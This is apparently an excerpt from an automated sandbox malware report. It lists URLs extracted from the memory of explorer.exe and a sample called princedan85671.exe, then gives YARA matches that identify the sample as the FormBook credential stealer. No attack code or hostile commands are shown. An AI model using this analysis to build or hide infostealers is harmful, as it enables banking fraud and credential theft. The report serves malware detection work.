Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000007.00000000.2184596718.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000007.00000000.2197599515.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2194841563.00000000042B3000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000007.00000000.2195641633.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000007.00000000.2184596718.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195641633.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.2195641633.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
